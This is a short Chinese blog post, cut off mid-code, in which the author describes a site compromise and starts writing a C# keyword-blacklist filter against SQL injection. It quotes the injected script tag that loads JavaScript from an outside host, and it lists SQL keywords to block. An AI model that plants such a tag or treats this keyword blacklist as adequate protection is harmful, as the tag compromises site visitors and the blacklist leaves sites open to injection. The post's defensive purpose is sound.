防SQL注入
最近中招<script src=http://s.see9.us/s.js></script>,比较郁闷,真是猖獗啊, 再回过头来看看代码中的拼接,发现几处 Request.QueryString并不是用参数传值,没有做限制,估计就是漏洞点,只有在补充过滤类,来限制了 1 /**/ /// <summary> 2 /// 过滤SQL注入关键字[post,get] 3 /// </summary> 4 /// <param name="pStr"></param> 5 /// <returns></returns> 6 public static string GetQueryStringSafe( string pStr) 7 { 8 bool IsValue = true ; 9 if (pStr != null && pStr.Length > 0 ) 10 { 11 pStr = pStr.ToLower(); 12 string strSQLin = " '|and|--|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare |;|&|%20|==|>|< " ; 13 string [] strSQLinGroup = strSQLin.Split( new char